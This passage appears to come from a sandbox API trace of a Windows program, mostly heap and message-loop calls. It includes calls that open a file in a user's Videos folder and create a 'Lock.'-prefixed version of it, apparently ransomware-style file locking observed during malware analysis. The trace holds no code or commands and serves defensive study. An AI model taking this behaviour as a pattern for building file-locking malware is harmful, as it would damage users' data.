hHeap=0x25c0000) returned 1 [0257.268] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa310 | out: hHeap=0x25c0000) returned 1 [0257.268] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0257.268] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8a0 | out: hHeap=0x25c0000) returned 1 [0257.268] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa280 | out: hHeap=0x25c0000) returned 1 [0257.268] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4c0 | out: hHeap=0x25c0000) returned 1 [0257.268] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ba0 | out: hHeap=0x25c0000) returned 1 [0257.268] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dc8 | out: hHeap=0x25c0000) returned 1 [0257.268] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6468 | out: hHeap=0x25c0000) returned 1 [0257.268] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa910 | out: hHeap=0x25c0000) returned 1 [0257.268] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0257.268] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249f200 | out: hHeap=0x25c0000) returned 1 [0257.268] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0257.268] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0257.268] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0257.268] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7c0 | out: hHeap=0x25c0000) returned 1 [0257.268] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c88 | out: hHeap=0x25c0000) returned 1 [0257.269] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0257.269] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6af8 | out: hHeap=0x25c0000) returned 1 [0257.269] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab68 | out: hHeap=0x25c0000) returned 1 [0257.269] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b98 | out: hHeap=0x25c0000) returned 1 [0257.269] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0257.269] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6be8 | out: hHeap=0x25c0000) returned 1 [0257.269] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5e0 | out: hHeap=0x25c0000) returned 1 [0257.269] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4d8 | out: hHeap=0x25c0000) returned 1 [0257.269] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7f0 | out: hHeap=0x25c0000) returned 1 [0257.269] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa00 | out: hHeap=0x25c0000) returned 1 [0257.269] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa508 | out: hHeap=0x25c0000) returned 1 [0257.269] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7d8 | out: hHeap=0x25c0000) returned 1 [0257.269] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466df0 | out: hHeap=0x25c0000) returned 1 [0257.269] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0257.269] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0288 | out: hHeap=0x25c0000) returned 1 [0257.269] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa988 | out: hHeap=0x25c0000) returned 1 [0257.269] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c40 | out: hHeap=0x25c0000) returned 1 [0257.269] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0257.269] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b70 | out: hHeap=0x25c0000) returned 1 [0257.269] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2f8 | out: hHeap=0x25c0000) returned 1 [0257.270] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6aa8 | out: hHeap=0x25c0000) returned 1 [0257.270] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0257.270] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3cb8 | out: hHeap=0x25c0000) returned 1 [0257.270] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaad8 | out: hHeap=0x25c0000) returned 1 [0257.270] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6ad0 | out: hHeap=0x25c0000) returned 1 [0257.270] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0257.270] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6558 | out: hHeap=0x25c0000) returned 1 [0257.270] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa328 | out: hHeap=0x25c0000) returned 1 [0257.270] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a08 | out: hHeap=0x25c0000) returned 1 [0257.270] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0257.270] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c60 | out: hHeap=0x25c0000) returned 1 [0257.270] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3e8 | out: hHeap=0x25c0000) returned 1 [0257.270] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6cb0 | out: hHeap=0x25c0000) returned 1 [0257.270] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1888 | out: hHeap=0x25c0000) returned 1 [0257.270] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6440 | out: hHeap=0x25c0000) returned 1 [0257.270] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa430 | out: hHeap=0x25c0000) returned 1 [0257.270] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1818 | out: hHeap=0x25c0000) returned 1 [0257.270] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0257.270] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa940 | out: hHeap=0x25c0000) returned 1 [0257.270] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa700 | out: hHeap=0x25c0000) returned 1 [0257.271] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0257.271] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0257.271] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0257.271] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0257.271] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0257.271] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0257.271] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4a8 [0257.271] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8b0 [0257.271] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1848 [0257.271] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa820 [0257.271] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos/5WsMFJk0dr95l c" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\5wsmfjk0dr95l c"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0257.271] GetLastError () returned 0x5 [0257.271] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0257.271] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1898 [0257.272] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0257.272] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0257.272] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1898 [0257.272] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa640 [0257.272] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa688 [0257.272] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0257.272] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4a8 [0257.272] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos/Lock.5WsMFJk0dr95l c" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\lock.5wsmfjk0dr95l c"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2cc [0257.273] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466df0 [0257.273] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0257.273] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13d8 [0257.273] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0257.273] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0257.273] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d820 [0257.273] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0257.273] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13d8 [0257.273] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa90 [0257.273] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5c8 [0257.273] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1898 [0257.273] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0257.273] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1368 [0257.273] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3a0 [0257.273] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9a0 [0257.273] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13d8 [0257.274] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa90 [0257.274] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0257.274] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1368 [0257.274] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1848 [0257.274] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e10 [0257.274] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0257.274] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1368 [0257.274] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6440 [0257.274] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1848 [0257.274] CharUpperBuffW (in: lpsz="A6000504F44", cchLength=0xb | out: lpsz="A6000504F44") returned 0xb [0257.274] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0257.274] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17c8 [0257.274] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1748 [0257.274] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2f8 [0257.274] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa988 [0257.274] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0257.274] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7d8 [0257.274] CharUpperBuffW (in: lpsz="SSA6000504F44", cchLength=0xd | out: lpsz="SSA6000504F44") returned 0xd [0257.275] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0257.275] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0257.275] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2f8 [0257.275] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17c8 [0257.275] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0257.275] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2f8 [0257.275] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17c8 [0257.275] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0257.275] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2f8 [0257.275] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17c8 [0257.275] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0257.275] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2f8 [0257.275] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17c8 [0257.275] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0257.281] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2f8 [0257.281] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17c8 [0257.281] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0257.281] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b70 [0257.281] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17c8 [0257.281] CharUpperBuffW (in: lpsz="A5400102815", cchLength=0xb | out: lpsz="A5400102815") returned 0xb [0257.281] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0257.281] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17c8 [0257.282] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1948 [0257.282] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa580 [0257.282] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa928 [0257.282] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18f8 [0257.282] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6b8 [0257.282] CharUpperBuffW (in: lpsz="SSA5400102815", cchLength=0xd | out: lpsz="SSA5400102815") returned 0xd [0257.282] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0257.282] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0257.282] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17c8 [0257.282] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b70 [0257.282] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1948 [0257.282] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0257.282] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0257.282] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1948 [0257.282] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18f8 [0257.282] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa928 [0257.282] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6b8 [0257.282] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0257.282] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa808 [0257.283] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0257.283] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0257.283] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0257.283] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1948 [0257.283] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18f8 [0257.283] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa928 [0257.283] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6b8 [0257.283] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0257.283] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa808 [0257.283] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0257.283] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0257.283] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b70 [0257.283] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17c8 [0257.283] CharUpperBuffW (in: lpsz="A610080612A", cchLength=0xb | out: lpsz="A610080612A") returned 0xb [0257.283] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0257.283] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17c8 [0257.283] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1948 [0257.284] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa928 [0257.284] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6b8 [0257.284] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18f8 [0257.284] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa808 [0257.284] CharUpperBuffW (in: lpsz="SSA610080612A", cchLength=0xd | out: lpsz="SSA610080612A") returned 0xd [0257.284] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0257.284] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0257.284] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17c8 [0257.284] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa928 [0257.284] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6b8 [0257.284] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1948 [0257.284] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa808 [0257.284] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0257.284] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0257.284] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17c8 [0257.285] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0257.285] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d8a0 [0257.285] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0257.285] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17c8 [0257.285] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1948 [0257.285] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e10 [0257.285] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0257.285] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0257.285] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17c8 [0257.285] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2f8 [0257.285] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa580 [0257.285] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1948 [0257.285] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b70 [0257.285] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18f8 [0257.286] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0257.286] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0257.286] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18f8 [0257.286] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0257.286] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6b8 [0257.286] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa808 [0257.286] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18b8 [0257.286] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa658 [0257.286] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0257.286] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0257.286] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0257.286] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18f8 [0257.286] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0257.286] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6b8 [0257.286] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, 